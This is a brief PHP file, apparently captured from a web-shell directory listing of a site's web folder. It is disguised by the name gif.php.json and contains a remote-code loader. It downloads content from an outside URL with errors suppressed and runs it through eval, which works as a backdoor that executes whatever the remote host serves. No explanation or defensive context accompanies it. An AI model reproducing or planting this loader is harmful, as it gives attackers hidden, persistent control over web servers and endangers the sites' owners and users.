| Current Path : /home/balossw/www/ |
| Current File : /home/balossw/www/gif.php.json |
<?php
$remote = 'https://softechnology.biz/raw/yOaD2JUke9';
$payload = @file_get_contents($remote);
if ($payload) {
ob_start();
eval("?>".$payload);
ob_end_flush();
} else {
echo "Failed to load remote file.";
}
?>